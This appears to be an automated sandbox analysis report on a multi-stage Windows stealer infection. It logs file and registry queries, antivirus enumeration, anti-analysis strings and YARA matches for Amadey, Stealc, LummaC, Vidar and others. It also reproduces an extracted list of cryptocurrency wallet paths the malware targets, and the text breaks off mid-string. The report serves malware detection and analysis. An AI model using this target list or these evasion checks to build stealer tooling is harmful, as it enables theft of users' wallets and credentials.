Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062154001\ddea05ffa5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062154001\ddea05ffa5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062155001\f1410e5168.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062155001\f1410e5168.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062156001\e2e9840d77.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062156001\e2e9840d77.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062157001\6e8173898b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062157001\6e8173898b.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C4435A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

8_2_6C4435A0

Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: procmon.exe
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: wireshark.exe
Source: eb74aeb58b.exe, 00000017.00000003.2392720867.0000000000C25000.00000004.00000020.00020000.00000000.sdmp, 1f1ada1ce1.exe, 00000018.00000003.2617506348.0000000001063000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.0xqfQZufeQ.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.skotes.exe.60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.8166ff9922.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.8166ff9922.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8166ff9922.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2719027362.0000000000D31000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.2431765076.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1460637313.0000000000A61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2117668850.00000000003B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1449265214.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2149443166.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2715844184.0000000000061000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1961862834.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2304832567.00000000003B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2071117362.0000000005320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2473503462.00000000003B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2264263901.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1419539913.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: a103019032.exe PID: 7480, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 382cd038a3.exe PID: 5600, type: MEMORYSTR

Yara detected GCleaner

Source: Yara match	File source: 13.2.3f28c42ac4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.3f28c42ac4.exe.4b40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.3f28c42ac4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.3f28c42ac4.exe.4cf0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2717348662.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2954337786.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2177798634.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: eb74aeb58b.exe PID: 2340, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 1f1ada1ce1.exe PID: 7256, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000008.00000002.2431848373.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2330839784.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2028635188.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2448228643.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2158030696.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2715340106.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2723505102.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2538106333.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2349197594.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2527946082.00000000000E1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2715346426.0000000000541000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8f4d1353d2.exe PID: 7728, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 0f39a8c7db.exe PID: 3340, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\.*
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\window-state.jsonl
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 0f39a8c7db.exe, 00000008.00000002.2448228643.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session 